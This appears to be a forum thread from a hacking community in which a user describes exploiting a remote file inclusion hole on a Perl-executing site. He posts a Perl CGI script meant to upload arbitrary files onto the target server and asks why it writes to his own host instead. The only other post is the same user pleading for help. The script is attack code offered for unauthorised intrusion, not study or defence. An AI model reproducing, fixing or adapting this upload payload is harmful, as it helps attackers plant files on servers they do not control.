Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Perl rfi

  1. Home
  2. Forum
  3. Web hacking
  4. Perl rfi

clone4's Avatar

clone4

Perl-6 Wisdom Seeker
0 0

ok so there is page vulnerable for rfi, but executes only perl scripts, I use script


#!C:/Perl/bin/perl.exe

use CGI;
use File::Basename;

my $file_location = "../";
my $query = new CGI;
my $filename = $query->param("file");

my $upload_filehandle = $query->upload("file");

open ( UPLOADFILE, ">$file_location/$filename" ) ;


while ( <$upload_filehandle> )
{

print $query->header ( );
print $file_location;
print UPLOADFILE;
}

close UPLOADFILE;

but even despite this script is executed by the remote server, file is uploaded on the server where is the script, and since I use relative path it should work properly, any ideas why is that happening ?

thx


clone4's Avatar

clone4

Perl-6 Wisdom Seeker
0 0

nothing ?:(:(

making sad eyes so somebody would help

brb don't know what's wrong, I've double checked everything, and script really is executed on the server, and there seem to be no restrictions regarding to it